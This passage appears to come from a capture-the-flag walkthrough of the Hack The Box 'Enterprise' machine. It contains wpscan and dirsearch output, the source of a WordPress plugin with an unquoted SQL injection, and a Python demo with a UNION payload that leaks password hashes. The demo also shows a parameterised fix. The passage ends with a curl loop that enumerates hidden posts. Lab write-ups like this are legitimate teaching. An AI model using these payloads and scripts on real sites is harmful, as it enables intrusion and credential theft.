 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
 |      - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
 |      - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
 |      - https://core.trac.wordpress.org/ticket/25239
 |
 | [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
 |     Fixed in: 4.8.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8941
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
 |      - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
 |      - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
 |      - https://twitter.com/ircmaxell/status/923662170092638208
 |      - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
 |
 | [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8966
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
 |
 | [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8967
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
 |
 | [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8968
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
 |
 | [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
 |     Fixed in: 4.8.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8969
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
 |      - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
 |
 | [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9006
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263
 |      - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
 |      - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/42720
 |
 | [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9021
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
 |      - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
 |      - https://github.com/quitten/doser.py
 |      - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
 |
 | [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9053
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
 |
 | [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9054
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
 |
 | [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
 |     Fixed in: 4.8.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9055
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
 |      - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
 |
 | [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
 |     Fixed in: 4.8.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9100
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
 |      - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
 |      - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
 |      - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
 |      - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
 |      - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated File Delete
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9169
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
 |
 | [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9171
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9172
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9173
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
 |
 | [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9174
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |
 | [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
 |     Fixed in: 4.8.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9175
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
 |      - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
 |      - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
 |
 | [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
 |     Fixed in: 5.0.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9222
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
 |      - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
 |      - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
 |
 | [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
 |     Fixed in: 4.8.9
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9230
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
 |      - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
 |      - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
 |      - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
 |
 | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
 |     Fixed in: 4.8.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9867
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
 |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
 |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
 |      - https://hackerone.com/reports/339483
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9908
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9909
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |      - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
 |      - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
 |
 | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9910
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9911
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9912
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
 |     Fixed in: 4.8.11
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9913
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
 |      - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
 |      - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
 |      - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
 |     Fixed in: 4.8.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9973
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
 |     Fixed in: 4.8.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9975
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://hackerone.com/reports/509930
 |      - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
 |
 | [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
 |     Fixed in: 4.8.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
 |
 | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
 |     Fixed in: 4.8.12
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10004
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
 |      - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
 |
 | [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
 |     Fixed in: 4.8.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10201
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47634/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
 |
 | [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
 |     Fixed in: 4.8.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10202
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47635/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
 |     Fixed in: 4.8.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10203
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47633/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
 |
 | [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
 |     Fixed in: 4.8.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10205
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47637/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
 |
 | [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
 |     Fixed in: 4.8.13
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/10206
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
 |      - https://wordpress.org/news/2020/04/wordpress-5-4-1/
 |      - https://core.trac.wordpress.org/changeset/47638/
 |      - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Aggressive Methods) Checking Known Locations - Time: 00:00:02 <> (328 / 328) 100.00% Time: 00:00:02 [+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen | Location: http://10.10.10.61/wp-content/themes/twentyfifteen/ | Latest Version: 2.6 | Last Updated: 2020-03-31T00:00:00.000Z | Readme: http://10.10.10.61/wp-content/themes/twentyfifteen/readme.txt | Style URL: http://10.10.10.61/wp-content/themes/twentyfifteen/style.css | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer. | Author: the WordPress team | Author URI: https://wordpress.org/ | License: GNU General Public License v2 or later | License URI: http://www.gnu.org/licenses/gpl-2.0.html | Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready | Text Domain: twentyfifteen | | Found By: Known Locations (Aggressive Detection) | - http://10.10.10.61/wp-content/themes/twentyfifteen/, status: 200 | | [!] 1 vulnerability identified: | | [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS) | Fixed in: 1.2 | References: | - https://wpvulndb.com/vulnerabilities/7965 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429 | - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html | - https://packetstormsecurity.com/files/131802/ | - https://seclists.org/fulldisclosure/2015/May/41 | | The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods) Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods) Checking DB Exports - Time: 00:00:00 <=======> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:04 <=========================> (100 / 100) 100.00% Time: 00:00:04
[i] Medias(s) Identified:
[+] http://10.10.10.61/?attachment_id=16 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=13 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=14 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=15 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=23 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=24 | Found By: Attachment Brute Forcing (Aggressive Detection)
[+] Enumerating Users (via Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:01 <==> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] william-riker | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] WPVulnDB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 48
[+] Finished: Thu May 21 17:19:49 2020
[+] Requests Done: 551
[+] Cached Requests: 7
[+] Data Sent: 123.606 KB
[+] Data Received: 12.569 MB
[+] Memory used: 219.777 MB
[+] Elapsed time: 00:00:15
wpscan reports a long list of core vulnerabilities because this WordPress is old: 4.8.1 dates from August 2017, and the fixes wpscan lists were only backported as 4.8.11 through 4.8.13. Author ID brute forcing also found one user, william-riker. Note that this enumeration returns the user_nicename slug from the /author/ redirect, which is not necessarily the login name; the actual user_login is confirmed later from the database.
Port 443
The HTTPS site only serves the default Apache page, so brute-force its directories:
u505@kali:~/HTB/Machines/Enterprise$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,php,js" -r 1 -f -t 1000 -u https://enterprise.local/
dirsearch v0.3.9
Extensions: txt, html, php, js | HTTP method: get | Threads: 1000 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-21_17-21-40.log
Target: https://enterprise.local/
[17:21:40] Starting:
[17:21:48] 403 - 297B - /.html
[17:21:52] 200 - 946B - /files/
[17:21:54] 403 - 298B - /icons/
[17:21:54] 200 - 11KB - /index.html
[17:21:56] 403 - 296B - /.php
[17:22:03] 403 - 306B - /server-status/
[17:22:12] Starting: files/
[17:22:12] 403 - 302B - /files/.php
[17:22:13] 403 - 303B - /files/.html
[17:23:44] Starting: icons/
[17:23:46] 403 - 303B - /icons/.html
[17:23:47] 403 - 302B - /icons/.php
[17:24:38] 200 - 35KB - /icons/README.html
[17:24:44] 403 - 304B - /icons/small/
[17:25:14] Starting: server-status/
Task Completed
Folder files
The /files/ directory (the 200 in the dirsearch output) lists a single zip archive, lcars.zip.
u505@kali:~/HTB/Machines/Enterprise$ wget --no-check-certificate https://enterprise.local/files/lcars.zip
--2020-05-21 17:25:36--  https://enterprise.local/files/lcars.zip
Resolving enterprise.local (enterprise.local)... 10.10.10.61
Connecting to enterprise.local (enterprise.local)|10.10.10.61|:443... connected.
WARNING: The certificate of ‘enterprise.local’ is not trusted.
WARNING: The certificate of ‘enterprise.local’ doesn't have a known issuer.
WARNING: The certificate of ‘enterprise.local’ has expired.
The certificate has expired
HTTP request sent, awaiting response... 200 OK
Length: 1406 (1.4K) [application/zip]
Saving to: ‘lcars.zip’
lcars.zip 100%[===================>] 1.37K --.-KB/s in 0s
2020-05-21 17:25:44 (24.4 MB/s) - ‘lcars.zip’ saved [1406/1406]
Unzip the archive:
u505@kali:~/HTB/Machines/Enterprise$ unzip lcars.zip
Archive:  lcars.zip
  inflating: lcars/lcars_db.php
  inflating: lcars/lcars_dbpost.php
  inflating: lcars/lcars.php
u505@kali:~/HTB/Machines/Enterprise$ cd lcars
u505@kali:~/HTB/Machines/Enterprise/lcars$ cat lcars.php
<?php
/*
 * Plugin Name: lcars
 * Plugin URI: enterprise.htb
 * Description: Library Computer Access And Retrieval System
 * Author: Geordi La Forge
 * Version: 0.2
 * Author URI: enterprise.htb
 *
 */

// Need to create the user interface.
// need to finsih the db interface
// need to make it secure

?>
These files are a custom WordPress plugin: lcars.php carries the standard plugin header comment, and the two other files include the site's wp-config.php to reuse its database credentials.
u505@kali:~/HTB/Machines/Enterprise/lcars$ cat lcars_db.php
<?php
include "/var/www/html/wp-config.php";
$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Test the connection:
if (mysqli_connect_errno()){
    // Connection Error
    exit("Couldn't connect to the database: ".mysqli_connect_error());
}

// test to retireve an ID
if (isset($_GET['query'])){
    $query = $_GET['query'];
    $sql = "SELECT ID FROM wp_posts WHERE post_name = $query";
    $result = $db->query($sql);
    echo $result;
} else {
    echo "Failed to read query";
}

?>
u505@kali:~/HTB/Machines/Enterprise/lcars$ cat lcars_dbpost.php
<?php
include "/var/www/html/wp-config.php";
$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Test the connection:
if (mysqli_connect_errno()){
    // Connection Error
    exit("Couldn't connect to the database: ".mysqli_connect_error());
}

// test to retireve a post name
if (isset($_GET['query'])){
    $query = (int)$_GET['query'];
    $sql = "SELECT post_title FROM wp_posts WHERE ID = $query";
    $result = $db->query($sql);
    if ($result){
        $row = $result->fetch_row();
        if (isset($row[0])){
            echo $row[0];
        }
    }
} else {
    echo "Failed to read query";
}
Only lcars_db.php is exploitable for SQL injection: it interpolates the raw query parameter into the SQL string, unquoted and unescaped, so whatever the client sends is executed as SQL. lcars_dbpost.php casts query to (int) before building its query, which rules out injection there, but it still returns the post_title of any ID with no check on post_status, post_type or the caller's permissions.
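To make the difference between the two handlers concrete, here is an added example (not code from the page or from the lcars plugin) that mirrors both PHP query builders in Python against a constructed in-memory SQLite table, next to the parameterised query the plugin should have used. The rows, the placeholder hash and the use of SQLite instead of MySQL are assumptions made for the demonstration; the column names follow the wp_posts / wp_users schema. The real lcars_db.php echoes the mysqli_result object rather than its rows (an object that cannot be converted to a string), so its data channel in practice is an error message; the mirror returns the rows so the effect of the injection is visible.

```python
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the WordPress database (assumption for this demo:
    SQLite instead of MySQL, made-up rows, only the columns the plugin touches)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_posts (ID INTEGER, post_name TEXT, post_title TEXT, post_status TEXT);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_posts VALUES (1,  'hello-world', 'Hello world!', 'publish');
        INSERT INTO wp_posts VALUES (66, 'passwords',   'Passwords',    'draft');
        INSERT INTO wp_users VALUES (1, 'someone', '$P$constructed-hash-for-demo');
    """)
    return db


def lcars_db(db: sqlite3.Connection, query: str) -> list:
    """Mirror of lcars_db.php: the raw parameter is spliced into the SQL, unquoted.
    A legitimate caller has to supply the quotes; a hostile one supplies SQL."""
    sql = f"SELECT ID FROM wp_posts WHERE post_name = {query}"
    return [row[0] for row in db.execute(sql)]


def php_int_cast(value: str) -> int:
    """Approximation of PHP's (int) cast on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def lcars_dbpost(db: sqlite3.Connection, query: str):
    """Mirror of lcars_dbpost.php: the (int) cast blocks injection, but there is
    no post_status / post_type / capability check, so any row is readable by ID."""
    sql = f"SELECT post_title FROM wp_posts WHERE ID = {php_int_cast(query)}"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lcars_db_fixed(db: sqlite3.Connection, query: str) -> list:
    """What lcars_db.php should do: bind the value, never splice it into the SQL."""
    sql = "SELECT ID FROM wp_posts WHERE post_name = ?"
    return [row[0] for row in db.execute(sql, (query,))]


# A classic UNION payload: the first SELECT matches nothing, the second leaks hashes.
PAYLOAD = "0 UNION SELECT user_pass FROM wp_users"

if __name__ == "__main__":
    db = build_db()
    print("lcars_db      :", lcars_db(db, PAYLOAD))        # leaks the hash
    print("lcars_dbpost  :", lcars_dbpost(db, PAYLOAD))    # cast to 0, no row
    print("lcars_dbpost  :", lcars_dbpost(db, "66"))       # draft title still readable
    print("lcars_db_fixed:", lcars_db_fixed(db, PAYLOAD))  # nothing
```

The int cast is a narrow fix: it stops injection in lcars_dbpost.php but leaves the information disclosure that the next section exploits, which a capability check (or simply not exposing an unauthenticated endpoint) would have prevented.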
Wordpress custom plugin abuse
lcars_dbpost.php returns the post_title of whatever ID it is given, with no check on post_status (drafts, revisions, private posts) or on who is asking, so a loop over IDs retrieves every title in wp_posts, including the ones the site never published.
u505@kali:~/HTB/Machines/Enterprise$ cat listpost.sh
#!/bin/sh
# Walk post IDs 1-100 and print every ID for which lcars_dbpost.php returns a title.
for i in `seq 1 100`
do
    URL="http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=$i"
    VAL=`curl -s "$URL" 2>/dev/null`
    VAL2=`echo $VAL | grep -v "^$"`
    if [ "#$VAL2#" != "##" ] ; then
        echo $URL
        echo $VAL2
    fi
done
u505@kali:~/HTB/Machines/Enterprise$ sh listpost.sh > postlist
